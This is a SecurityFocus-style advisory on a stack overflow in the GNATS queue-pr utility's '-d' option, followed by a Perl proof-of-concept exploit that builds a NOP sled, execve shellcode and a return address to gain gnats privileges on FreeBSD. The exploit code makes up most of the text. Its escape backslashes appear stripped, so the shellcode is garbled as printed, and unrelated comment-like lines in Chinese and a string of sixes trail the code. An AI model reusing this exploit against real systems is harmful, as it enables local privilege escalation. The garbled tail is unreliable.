source: http://www.securityfocus.com/bid/8232/info
A stack overflow vulnerability has been reported for the queue-pr utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option.
Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.
#!/usr/bin/perl
# Simple PoC exploit for gnats
# Tested on FreeBSD 5.0 with gnats-3.113.1_6
# if all works it gives gnats access
# Code by inv[at]dtors
$ret_hex = 0xbfbffb90;
$shellcode ="x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x54x53x52x31xc0xb0x3bxcdx80x31xc0xb0x01xcdx80";
$nops = "x90"x1110;
$ret = pack('l', $ret_hex);
$exploit = "$nops"."$shellcode"."$ret"."$ret";
local($ENV{'EXP'}) = $exploit;
print "ndtors gnats exploitn";
print "code by invnn";
print ("Address: 0x", sprintf('%lx', $ret_hex),"nn");
system('/usr/local/libexec/gnats/queue-pr -d $EXP -O bbb');
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666